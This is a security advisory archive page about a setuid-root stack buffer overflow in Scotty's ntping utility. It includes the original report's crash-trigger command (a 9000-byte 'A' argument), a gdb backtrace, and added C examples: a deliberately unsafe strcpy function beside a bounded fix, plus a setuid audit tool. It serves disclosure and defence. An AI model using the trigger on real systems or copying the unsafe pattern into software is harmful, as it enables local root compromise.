SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   Scotty
Vendors:   [Multiple Authors/Vendors]
Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
SecurityTracker Alert ID:  1001770
SecurityTracker URL:  http://securitytracker.com/id/1001770
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 17 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.1.11
Description:   A vulnerability has been discovered in Scotty, a Tcl interpreter for network management applications. The security hole exists in the ntping utility and allows local users to execute arbitrary code and gain root-level privileges on the host.

The following command will reportedly trigger the buffer overflow vulnerability:

[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

Because ntping is installed setuid root (the SuSE file listing quoted in the source message below shows it as -rwsr-xr-x root root), this stack buffer overflow lets a local user execute code with an effective user id of 'root'. The gdb backtrace in the source message ends in a frame at 0x41414141 ('AAAA'), consistent with the saved return address having been overwritten by the over-long command-line argument.
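The class of bug the backtrace points to, as an added C example that is not Scotty's source (ntping's real buffer size and copy routine are not on this page; HOST_MAX and the function names below are this example's own assumptions): a hostname taken from argv is copied into a fixed-size stack buffer before it is handed to the resolver, shown beside a bounded version that refuses over-long or malformed names instead of copying them. Only the bounded version is ever called; the unsafe one is kept as the reference pattern.

```c
/* Added example, not Scotty's code: the unchecked-copy pattern that the
 * advisory's backtrace suggests, beside a bounded replacement.
 * HOST_MAX and the resolve_target_* names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 64   /* assumed buffer size; ntping's real one is unknown */

/* Vulnerable pattern: strcpy() with no length check.  Calling this with a
 * name of HOST_MAX bytes or more overwrites the stack (undefined behaviour);
 * a 9000-byte 'A' string overwrites the saved return address with
 * 0x41414141, which is what the advisory's gdb frame #6 shows.  Never call
 * this in a setuid program; it is here only as the "before" picture. */
int resolve_target_unsafe(const char *arg)
{
    char host[HOST_MAX];
    strcpy(host, arg);                 /* overflow when strlen(arg) >= HOST_MAX */
    return (int)strlen(host);          /* a real tool would call gethostbyname(host) */
}

/* Bounded version: refuse (do not truncate) anything that does not fit,
 * and refuse characters that cannot occur in a hostname or IP literal,
 * since a setuid program should not hand arbitrary bytes to the resolver.
 * Returns 0 and fills out[] on success, -1 on rejection. */
int resolve_target_safe(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= outlen)
        return -1;                     /* too long for the buffer */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        /* letters, digits, '.', '-', and ':' (IPv6 literal) only */
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return -1;
    }
    memcpy(out, arg, n + 1);           /* n + 1 <= outlen, includes the NUL */
    return 0;
}

/* Build the advisory's probe (len bytes of 'A', constructed here) and report
 * whether the bounded version refuses it: 1 = rejected, 0 = accepted,
 * -1 = allocation failed. */
int probe_rejected(size_t len)
{
    char host[HOST_MAX];
    char *probe = malloc(len + 1);
    if (!probe)
        return -1;
    memset(probe, 'A', len);
    probe[len] = '\0';
    int rc = resolve_target_safe(probe, host, sizeof host);
    free(probe);
    return rc != 0;
}

int main(int argc, char **argv)
{
    char host[HOST_MAX];
    if (argc != 2) {
        fprintf(stderr, "usage: %s HOST\n", argv[0]);
        return 2;
    }
    if (resolve_target_safe(argv[1], host, sizeof host) != 0) {
        fprintf(stderr, "rejected: empty, over-long or malformed hostname\n");
        return 1;
    }
    printf("would resolve %s\n", host);   /* gethostbyname(host) would go here */
    return 0;
}
```

Run it with the advisory's probe, `./a.out "$(perl -e 'print "A" x 9000')"`, and the bounded version exits 1 with "rejected" instead of crashing; the unsafe variant is the one that segfaults. Refusing rather than truncating matters: a silently truncated name resolves to a different host than the one requested.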

Impact:   A local user can execute arbitrary code and gain root level privileges on the host.
Solution:   The vendor has released a fix (scotty 2.1.11).
Vendor URL:  wwwhome.cs.utwente.nl/~schoenw/scotty/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(SuSE Issues Fix) Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
The vendor has released a fix.



 Source Message Contents

Subject:  suid scotty (ntping) overflow



 I am not sure that this made it on to the list the first time I sent 
 it... so sorry if this is a duplicate 

 [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` 
 Segmentation fault (core dumped) 

 Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/ 

 What led me to research this: 
 arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote: 
 > i run scotty-testsuite: what must i change on my system:(Linux 
 > slackware): 
 > ==== Test generated error: 
 > can not connect straps socket: Permission denied 
 straps and ntping must be installed suid root. 

 ^------- Hrmm I sure thought that was interesting to know *grin* 

 Vendors affected: 
 unknown by the author of this document 

 just a note I found however... 

 <19990702221232.79B119410@Galois.suse.de> 
 Hi folks, 
 here is the long promised posting of all suid/sgid files on a alpha of 
 SuSE 
 Linux 6.2 ... comments on wrong permissions are welcome. 
 Please note that SuSE has got 5 full CD-Roms so that's the reason for 
 the many many files ... (and too much suid/sgid ones ...) 
 ... 
 -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping 
 -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps 
 ... 

 [root@linux d0tslash]# gdb /usr/bin/ntping core 
 GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 
 This GDB was configured as "i386-mandrake-linux"... 
 (no debugging symbols found)... 
 Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. 

 Program terminated with signal 11, Segmentation fault. 
 Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done. 
 Loaded symbols for /lib/libnsl.so.1 
 Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done. 
 Loaded symbols for /lib/libresolv.so.2 
 Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. 
 Loaded symbols for /lib/libc.so.6 
 Reading symbols from /lib/ld-linux.so.2...done. 
 Loaded symbols for /lib/ld-linux.so.2 
 Reading symbols from /lib/libnss_files.so.2...done. 
 Loaded symbols for /lib/libnss_files.so.2 
 #0 0x40079b66 in getenv () from /lib/libc.so.6 
 (gdb) bt 
 #0 0x40079b66 in getenv () from /lib/libc.so.6 
 #1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6 
 #2 0x4013b9de in __res_ninit () from /lib/libc.so.6 
 #3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6 
 #4 0x4013ff5f in gethostbyname () from /lib/libc.so.6 
 #5 0x080495b8 in _start () 
 #6 0x41414141 in ?? () 
 Cannot access memory at address 0x41414141 

 -KF
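Added example, not from the advisory or from Scotty, of the two checks a practitioner would run on a host after reading the SuSE listing above: enumerate the setuid files in a directory the way `find DIR -maxdepth 1 -type f -perm -4000` would, and clear the setuid bit on ntping or straps as an interim mitigation until scotty 2.1.11 is installed. The function names are this example's own. ntping is setuid because sending ICMP needs a raw socket, which requires root; stripping the bit stops the tool working for ordinary users, which is the intended effect of the mitigation.

```c
/* Added example, not part of the advisory or of Scotty: list setuid files
 * in one directory and clear the bit on a named file (chmod u-s,g-s).
 * Function names are this example's own. */
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if path is a regular file with the setuid bit set, 0 if not, -1 on error. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID)) ? 1 : 0;
}

/* Count the setuid regular files directly inside dir (no recursion),
 * printing each with owner uid and mode when verbose is set, and flagging
 * the ones owned by root since those are the ones that yield uid 0.
 * Returns the count, or -1 if dir cannot be opened. */
int count_setuid_in(const char *dir, int verbose)
{
    DIR *d = opendir(dir);
    if (!d)
        return -1;
    int n = 0;
    struct dirent *e;
    char path[4096];
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode))
            continue;                       /* symlinks are not followed */
        if (st.st_mode & S_ISUID) {
            n++;
            if (verbose)
                printf("%s uid=%u mode=%04o%s\n", path, (unsigned)st.st_uid,
                       (unsigned)(st.st_mode & 07777),
                       st.st_uid == 0 ? " (setuid root)" : "");
        }
    }
    closedir(d);
    return n;
}

/* Clear setuid and setgid on path, keeping every other permission bit.
 * Returns 0 on success, -1 on error (e.g. not the owner and not root). */
int strip_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return chmod(path, (st.st_mode & 07777) & ~(S_ISUID | S_ISGID));
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s DIR [FILE-TO-STRIP]\n", argv[0]);
        return 2;
    }
    int n = count_setuid_in(argv[1], 1);
    printf("%d setuid file(s) in %s\n", n, argv[1]);
    if (argc > 2 && strip_setuid(argv[2]) != 0) {
        perror("chmod");
        return 1;
    }
    return n < 0;
}
```

On an affected host the audit would be `./suidaudit /usr/bin` and the mitigation `./suidaudit /usr/bin /usr/bin/ntping` run as root (only the owner or root can chmod a root-owned file); straps gets the same treatment. Re-run the listing after upgrading, since the package install restores the bit on the fixed binary.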


Copyright 2021, SecurityGlobal.net LLC